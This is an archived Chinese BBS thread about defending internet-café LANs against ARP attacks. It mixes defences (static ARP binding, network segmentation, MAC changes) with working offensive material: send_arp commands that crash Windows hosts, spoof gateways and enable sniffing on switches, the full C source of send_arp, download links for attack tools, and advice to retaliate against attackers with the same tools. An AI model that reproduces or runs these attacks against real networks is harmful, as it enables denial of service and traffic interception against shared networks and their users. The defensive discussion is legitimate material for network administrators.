荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: cfans (亮亮), 信区: Security
标 题: 防御局域网攻击 ZT!
发信站: 荔园晨风BBS站 (Fri Jun 25 18:57:08 2004), 站内信件
------------------------------------------------------------------------
--------
发帖者:figo 讨论区:网络安全推荐区
标题:防御局域网攻击 ZT!
发信站:安全焦点(2002年11月13日22时10分16秒)
我一个朋友的网吧最近遭受一种奇怪的攻击,他网吧一共有60台机器,和另外6个
网吧并在一个网段中,IP地址从192.168.0.1~192.168.0.255,大家共用CS服务器
和WEB及流媒体服务器,其中一台CS服务器和流媒体服务器在他网吧里。
最近每晚和中午,他网吧客满的时候,就有人在网内对他网吧的IP段进行攻击。表
现是大面积IP地址冲突,造成机器暂时停止网络响应,而且网络中的CS服务器和流
媒体服务器马上停止响应。一般持续半小时以上,IP冲突的速度大约10秒一次。连
续几天都是如此,造成他很大损失。
我朋友求助于我,于是我先试验了一下,证明故意修改IP的方式是无法造成服务器
失去响应的,于是我在他网吧两台机器上安装了一些监测软件,试图捕捉对方的攻
击数据包,然后再取得对方的MAC地址来查找攻击来源。由于主要表现是IP冲突,
所以我使用commview3专门捕捉所有的ARP协议包,结果在晚上对方攻击时果然发现
出现了大量有规律的ARP广播包,那些包明显是某种软件生成的,MAC地址是随机伪
造的,IP地址就是他网吧的系列IP,这种包和一般开机的包不同,是
pass-thourgh包,机器收到后98系统马上失去网络响应,只有等很长时间或者重起
,2K系统也马上失去响应,必须点确定才能恢复,但是所有连接的用户都Time
Out了。
由于包里MAC地址是伪造的,所以我无法查到来源,于是我去网上查找了一些资料
,证明这是一种ARP拒绝服务攻击,但是没找到任何有效防范办法,微软也没有相
应的补丁。唯一的办法除非在网络中使用路由器屏蔽ARP,用硬件存储ARP列表,但
是路由器不是一个小网吧可以承担的设备。当然如果划分网段,再用网关把他和大
家隔开也可以,因为ARP只在一个网段传播,但是这样别人就无法共用他们的服务
器,而且破坏者也可以到他网吧来继续破坏,这也是不行的。
我又试用了各种防火墙软件,证明也无法拦住这样的攻击包,没有一个防火墙产品
可以屏蔽非法的ARP包。使用天网2.5和金山网镖,甚至用断开网络选项都无法挡住
攻击。
我后来在网上找到了一个叫做“……”(为防止别有用心的人用来干坏事,我略去
这个软件的名字,转贴者也就是本人注)的软件,果然可以达到这个效果,证明这
样的攻击软件在网上是大量存在的,大家可以去google里搜索下载这个软件。
我现在唯一能告诉他的办法就是遇到攻击就拔网线,各位高手,还有没有什么低廉
方便的手段能解决这个问题啊,我朋友都急死了,再这样他的网吧就做不下去了。
请大家帮帮忙!!谢谢:)
分析:
网上关于ARP的资料已经很多了,就不用我都说了。
用某一位高手的话来说,“我们能做的事情很多,唯一受
限制的是我们的创造力和想象力”。
ARP也是如此。
以下讨论的机子有
一个要攻击的机子:10.5.4.178
硬件地址:52:54:4C:98:EE:2F
我的机子: :10.5.3.69
硬件地址:52:54:4C:98:ED:C5
网关: 10.5.0.3
硬件地址:00:90:26:3D:0C:F3
一台交换机另一端口的机子:10.5.3.3
硬件地址:52:54:4C:98:ED:F7
一:用ARP破WINDOWS的屏保
原理:利用IP冲突的级别比屏保高,当有冲突时,就会
跳出屏保。
关键:ARP包的数量适当。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3
10.5.4.178 52:54:4C:98:EE:2F 40
二:用ARP导致IP冲突,死机
原理:WINDOWS 9X,NT4在处理IP冲突时,处理不过来,导致死机。
注: 对WINDOWS 2K,LINUX相当于flooding,只是比一般的FLOODING
有效的多.对LINUX,明显系统被拖慢。
[root@sztcww tools]# ./send_arp 10.5.4.178 00:90:26:3D:0C:F3
10.5.4.178 52:54:4C:98:EE:2F 999999999
三:用ARP欺骗网关,可导致局域网的某台机子出不了网关。
原理:用ARP应答包去刷新对应着要使之出不去的机子。
[root@sztcww tools]# ./send_arp 10.5.4.178 52:54:4C:98:EE:22
10.5.4.178 00:90:26:3D:0C:F3 1
注意:如果单单如上的命令,大概只能有效几秒钟,网关机子里的ARP
高速缓存会被被攻击的机子正确刷新,于是只要...
四:用ARP欺骗交换机,可监听到交换机另一端的机子。
可能需要修改一下send_arp.c,构造如下的数据包。
ethhdr
srchw:52:54:4C:98:ED:F7--->dsthw:FF:FF:FF:FF:FF:FF proto:806H
arphdr
hwtype:1 protol:800H hw_size:6 pro_size:4 op:1
s_ha:52:54:4C:98:ED:F7 s_ip:10.5.3.3
d_ha:00:00:00:00:00:00 d_ip:10.5.3.3
然后就可以sniffer了。
原理:
交换机是具有记忆MAC地址功能的,它维护一张MAC地址和它的口号表
所以你可以先来个ARP 欺骗,然后就可以监听了
不过需要指出,欺骗以后,同一个MAC地址就有两个端口号
yuange说,“这样其实就是一个竞争问题。”
好象ARP 以后,对整个网络会有点影响,不过我不敢确定
既然是竞争,所以监听也只能监听一部分,不象同一HUB下的监听。
对被监听者会有影响,因为他掉了一部分数据。
当然还有其他一些应用,需要其他技术的配合。
以下是send_arp.c的源程序
/*
This program sends out one ARP packet with source/target IP
and Ethernet hardware addresses suuplied by the user. It
compiles and works on Linux and will probably work on any
Unix that has SOCK_PACKET. volobuev@t1.chem.umn.edu
*/
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <signal.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/ip_icmp.h>
#include <linux/if_ether.h>
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define OP_ARP_QUEST 1
#define DEFAULT_DEVICE "eth0"
char usage[] = {"send_arp: sends out custom ARP packet. yuri volobuev
usage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr
number"};
struct arp_packet
{
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN];
u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};
void die (char *);
void get_ip_addr (struct in_addr *, char *);
void get_hw_addr (char *, char *);
int main (int argc, char * argv[])
{
struct in_addr src_in_addr, targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
int j,number;
if (argc != 6)
die(usage);
sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_RARP));
if (sock < 0)
{
perror("socket");
exit(1);
}
number=atoi(argv[5]);
pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op = htons(OP_ARP_QUEST);
get_hw_addr(pkt.targ_hw_addr, argv[4]);
get_hw_addr(pkt.rcpt_hw_addr, argv[4]);
get_hw_addr(pkt.src_hw_addr, argv[2]);
get_hw_addr(pkt.sndr_hw_addr, argv[2]);
get_ip_addr(&src_in_addr, argv[1]
get_ip_addr(&targ_in_addr, argv[3]
memcpy(pkt.sndr_ip_addr, &src_in_addr, IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr, &targ_in_addr, IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data,DEFAULT_DEVICE);
for (j=0;j<number;j++)
{
if (sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0)
{
perror("sendto");
exit(1);
}
}
exit(0);
}
void die (char *str)
{
fprintf(stderr,"%sn",str);
exit(1);
}
void get_ip_addr (struct in_addr *in_addr, char *str)
{
struct hostent *hostp;
in_addr->s_addr = inet_addr(str);
if(in_addr->s_addr == -1)
{
if ((hostp = gethostbyname(str)))
bcopy(hostp->h_addr, in_addr, hostp->h_length);
else {
fprintf(stderr, "send_arp: unknown host %sn", str);
exit(1);
}
}
}
void get_hw_addr (char *buf, char *str)
{
int i;
char c, val;
for(i = 0; i < ETH_HW_ADDR_LEN; i++)
{
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit©)
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf = val << 4;
if (!(c = tolower(*str++)))
die("Invalid hardware address");
if (isdigit©)
val = c - '0';
else if (c >= 'a' && c <= 'f')
val = c-'a'+10;
else
die("Invalid hardware address");
*buf++ |= val;
if (*str == ':')
str++;
}
}
以下是我用軟件攔下的局域網終結者的記錄﹐看來這個軟件只是根據你在攻擊軟件
里面輸入的IP列表的IP及MAC地址﹐然后產生一個假的MAC地址去﹐使正在使用的網
絡發生異常﹐我也試著解決這個問題﹐但目前除了靜態ARP之外﹐沒有其他更好的
辦法了﹐這是采用TCP/IP協議的必然了。
但是作為網管﹐完全可以追蹤到搞破壞的人的電腦呀﹐然后把此人打成馬蜂窩﹐并
送公安局﹐這種只會利用別人現在工具搞破壞的人最可誤了﹗有能力自己寫吧﹗
下面作參考﹐但不要攻擊我呀﹐如果有錯誤﹐請大家指正﹐謝謝了﹗
1581 89.348477 LOCAL REALTEEE1819 SMB R tree disconnect FANLI 7733797.
00E04CEE1819 IPX/XNS
Frame: Base frame properties
Frame: Time of capture = 2002/10/23 13:48:21.616
Frame: Time delta from previous physical frame: 0 microseconds
Frame: Frame number: 1581
Frame: Total frame length: 100 bytes
Frame: Capture frame length: 100 bytes
Frame: Frame data: Number of data bytes remaining = 100 (0x0064)
ETHERNET: 802.3 Length = 100
ETHERNET: Destination address : 00E04CEE1819
ETHERNET: .......0 = Individual address
ETHERNET: ......0. = Universally administered address
ETHERNET: Source address : 00E04CF8B16B
ETHERNET: .......0 = No routing information present
ETHERNET: ......0. = Universally administered address
ETHERNET: Frame Length : 100 (0x0064)
ETHERNET: Data Length : 0x0056 (86)
ETHERNET: Ethernet Data: Number of data bytes remaining = 86 (0x0056)
LLC: UI DSAP=0xE0 SSAP=0xE0 C
LLC: DSAP = 0xE0 : INDIVIDUAL : Novell IPX/SPX
LLC: SSAP = 0xE0: COMMAND : Novell IPX/SPX
LLC: Frame Category: Unnumbered Frame
LLC: Command = UI
LLC: LLC Data: Number of data bytes remaining = 83 (0x0053)
IPX: NetBIOS Packet - 7733797.00E04CF8B16B.455 -> 7733797.00E04CEE1819.
455 - 0 Hops
IPX: Checksum = 65535 (0xFFFF)
IPX: IDP Length = 83 (0x53)
IPX: Transport control = 0 (0x0)
IPX: Packet type = IPX
IPX: Destination Address Summary 7733797.00E04CEE1819.455
IPX: Destination IPX Address = 07733797.00E04CEE1819
IPX: Destination Net Number = 124991383 (0x7733797)
IPX: Destination Socket Number = NetBIOS
IPX: Source Address Summary 7733797.00E04CF8B16B.455
IPX: Source IPX Address = 07733797.00E04CF8B16B
IPX: Source Net Number = 124991383 (0x7733797)
IPX: Source Socket Number = NetBIOS
IPX: Data: Number of data bytes remaining = 53 (0x0035)
NBIPX: Session Data
NBIPX: Connection control flag
NBIPX: 0....... = Non system packet
NBIPX: .0...... = No send acknowledge
NBIPX: ..0..... = No Attention
NBIPX: ...1.... = End Of Message
NBIPX: ....0... = No resend
NBIPX: Data stream type = Session Data
NBIPX: Source connection ID = 10227 (0x27F3)
NBIPX: Destination connection ID = 3 (0x3)
NBIPX: Send sequence number = 119 (0x77)
NBIPX: Total data length = 35 (0x23)
NBIPX: Offset = 0 (0x0)
NBIPX: Data length = 35 (0x23)
NBIPX: Receive Sequence number = 122 (0x7A)
NBIPX: Bytes received = 127 (0x7F)
NBIPX: Data: Number of data bytes remaining = 35 (0x0023)
SMB: R tree disconnect
SMB: NT status code = 0x0, Facility = System, Severity = Success, Code =
(0) STATUS_WAIT_0
SMB: NT Status Severity Code = Success
SMB: NT Status Customer Code = 0 (0x0)
SMB: NT Status Reserved Bit = 0 (0x0)
SMB: NT Status Facility = System
SMB: NT Status Code System Success = STATUS_WAIT_0
SMB: Header: PID = 0xFEFF TID = 0x0803 MID = 0x5E84 UID = 0x6801
SMB: Tree ID (TID) = 2051 (0x803)
SMB: Process ID (PID) = 65279 (0xFEFF)
SMB: User ID (UID) = 26625 (0x6801)
SMB: Multiplex ID (MID) = 24196 (0x5E84)
SMB: Flags Summary = 152 (0x98)
SMB: .......0 = Lock & Read and Write & Unlock not supported
SMB: ......0. = Send No Ack not supported
SMB: ....1... = Using caseless pathnames
SMB: ...1.... = Canonicalized pathnames
SMB: ..0..... = No Opportunistic lock
SMB: .0...... = No Change Notify
SMB: 1....... = Server response
SMB: flags2 Summary = 51207 (0xC807)
SMB: ...............1 = Understands long filenames
SMB: ..............1. = Understands extended attributes
SMB: ...0............ = No DFS namespace
SMB: ..0............. = No paging of IO
SMB: .1.............. = Using NT status codes
SMB: 1............... = Using UNICODE strings
SMB: Unknown Flag2 bits = 2052 (0x804)
SMB: Command = C tree disconnect
SMB: Word count = 0
SMB: Byte count = 0
00000: 00 E0 4C EE 18 19 00 E0 4C F8 B1 6B 00 56 E0 E0 .àLî...à
Lø±k.Vàà
00010: 03 FF FF 00 53 00 04 07 73 37 97 00 E0 4C EE 18 .ÿÿ.S.
..s7—.àLî.
00020: 19 04 55 07 73 37 97 00 E0 4C F8 B1 6B 04 55 10 ..U.s7—.à
Lø±k.U.
00030: 06 F3 27 03 00 77 00 23 00 00 00 23 00 7A 00 7F .ó'..w.#...#.z
00040: 00 FF 53 4D 42 71 00 00 00 00 98 07 C8 00 00 00 .ÿSMBq....
˜;.È...
00050: 00 00 00 00 00 00 00 00 00 03 08 FF FE 01 68 84 ...........
ÿþ.h„;
00060: 5E 00 00 00 ^...
解决方法:
方法一:
网段A(192.168.0.x) 通过------> 网关服务器(192.168.0.1;192.168.10.1)
-----〉 和网段B(192.168.10.x)通信。
假设架设 CS服务器在 网段B 192.168.10.88 机器上,
现在 在 网关服务器上架着一个端口转发程序(有很多的自己找)
比如定义 网关服务器的27015端口 转发 指定 192.168.0.10.88 的27015端口
现在在网段A(192.168.0.x) 的玩家只要的 互联网游戏地址处加入 192.168.0.1:
27015 就可以找到 192.168.10.88 的CS服务器了
个人认为比较好的 办法是 把网段分开 , 在网关服务器上做端口转发服务
来达到 共享CS服务器等 功能,就可以解决了~
方法二:
捆绑MAC和IP地址 杜绝IP地址盗用现象
到代理服务器端让网络管理员把您上网的静态IP地址与所记录计算机的网卡地址进
行捆绑。具体命令是:
ARP -s 192.168.0.4 00-EO-4C-6C-08-75
这样,就将您上网的静态IP地址192.168.0.4与网卡地址为
00-EO-4C-6C-08-75的计算机绑定在一起了,即使别人盗用您的IP地址192.168.0.
4也无法通过代理服务器上网。其中应注意的是此项命令仅在局域网中上网的代理
服务器端有用,还要是静态IP地址,像一般的Modem拨号上网是动态IP地址就不起
作用。接下来我们对各参数的功能作一些简单的介绍:
ARP-s-d-a
-s——将相应的IP地址与物理地址的捆绑。
-d——删除所给出的IP地址与物理地址的捆绑。
-a——通过查询Arp协议表来显示IP地址和对应物理地址情况。
方法三:
网络执法官这个软件相信大家都听说过了。功能不错,可以禁止局域网任意机器连
接网络。这个功能对网管来说的确不错。不过如果这个软件落到那些卑鄙小人的手
里---那后果就不堪设想了。轻则把你封了上不了网,重则可以导致整个局域网瘫
痪。。
废话不说了,切入正题吧。现在教大家两招轻松防范网络执法官!!
NO.1
首先呢,最稳妥的一个办法就是修改机器的MAC地址,只要把MAC地址改为别的,就
可以欺骗过网络执法官,从而达到突破封锁的目的。下面是修改MAC地址的方法:
linux环境下:
需要用
#ifconfig eth0 down
先把网卡禁用
再用ifconfig eth0 hw ether 1234567890ab
这样就可以改成功了
要想永久改就这样
在/etc/rc.d/rc.local里加上这三句(也可以在/etc/init.d/network里加下面三行
)
ifconfig eth0 down
ifconfig eth0 hw ether 1234567890ab
ifconfig eth0 up
另:
在win2000中改MAC地址的方法:
打开注册表编辑器,找到
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlClass{4D36E972-E325-11CE
-BFC1-08002BE10318}子键,在该子键下的0000,0001,0002等分支中查找
DriverDesc,在0000子键下天一个字符串项,命名为NetworkAddress,键值设为修
改后的MAC地址,要求为连续的12个16进制数,如1234567890AB(注意位数要对!不
能是000000000000,不能与别的机器重复)。然后在0000下的NDIparams中加一项名
为NetworkAddress的子键,在该子键下添加名为defau
lt的字符串,键值为修改后的MAC地址,与上面的数值相同。在NetworkAddress的
主键下继续添加命名为ParamDesc的字符串,其作用是制定NetworkAddress主键的
描述,其值可为“MAC 地址”,这样以后打开网络属性,双击相应的网卡会发现有
一个高级设置,其下坐在“MAC地址”的选项,在此修改MAC地址就可以了,修改后
需重启。
Windows环境:
用dos,8139的可以改,用realtek的pg8139.exe,比如 是8139c网卡,就改写
8139c.cfg文件,第一行就是网卡mac,想怎么改就怎么改
NO.2
另外一种方法,我没有试,一种设想,有条件的朋友帮忙试一下。
由于网络执法官的原理是通过ARP欺骗发给被攻击的电脑一个假的网关IP地址对应
的MAC,使其找不到网关真正的MAC,那么我们可以自己修改IP->MAC的映射,使网
络执法官ARP欺骗失效。具体做法如下:
在还没有被封锁的时候进入CMD执行如下命令
e:>ping 192.168.9.1 (假设此地址位网关。)
Pinging 192.168.9.1 with 32 bytes of data:
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Reply from 192.168.9.1: bytes=32 time<10ms TTL=64
Ping statistics for 192.168.9.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
e:>arp -a
Interface: 192.168.9.1 on Interface 0x5000003
Internet Address Physical Address Type
192.168.9.1 00-0E-70-32-f1-02 dynamic
(上面的就是网关的MAC)
然后作这样一个批处理文件保存起来。。注意!!!地址要换为你自己的网关的
IP和MAC
arp -s 192.168.9.1 00-0E-70-32-f1-02
然后呢,在你被封锁的时候,就执行这个批处理吧。
NO.3
如果解除了网络执法官的封锁可不可以查到使用网络执法官的人究竟是谁呢?答案
是可以!(感谢zva提供方法)利用arpkiller的sniffer杀手扫描整个局域网IP段查
找处在“混杂”(监听)模式下的计算机,应该就是他了!!!(注意,扫描的时候
自己也处在混杂模式,自己不能算哦)
之后做什么呢?就不用我说了吧?哈哈,以毒攻毒,用网络执法官把她封了!
附:
用到的工具在此下载:
网络执法官1.02注册版
http://soft.piaoye.com/downtrojan/lanlawman1.02.zip
arpkiller:
http://www.chinesehack.org/soft/sni...RPKiller1.3.zip
贴子来源:
http://www.adsl4u.net/cn
原作者:小兔
转贴和评论者:子钧
评论:
防止这种攻击最好的办法就是MAC地址和IP地址绑定,也可以防止用黑白名单时盗
用白名单的IP,对于一些单位的网络控制也有点用处。
不会查MAC地址的初学者用 ipconfig/all 就可以显示了。
--
http://software.leepig.com/netdisk/001
user:001
pass:bingdu
------------------------------------------------------------------------
--------
发帖者:hopii 讨论区:网络安全推荐区
标题:回复:防御局域网攻击 ZT!
发信站:安全焦点(2002年11月14日13时37分41秒)
换个思路,不要只想怎么防御.找到是谁做的,然后......
到2000的日志里可以看到与你冲突的实际MAC地址.
然后通过这个MAC找到IP,后面的就要量力而行了.:)
--
现在学C#了,呵呵。好久没接触网络安全了。
http://192.168.52.99
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.52.99]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店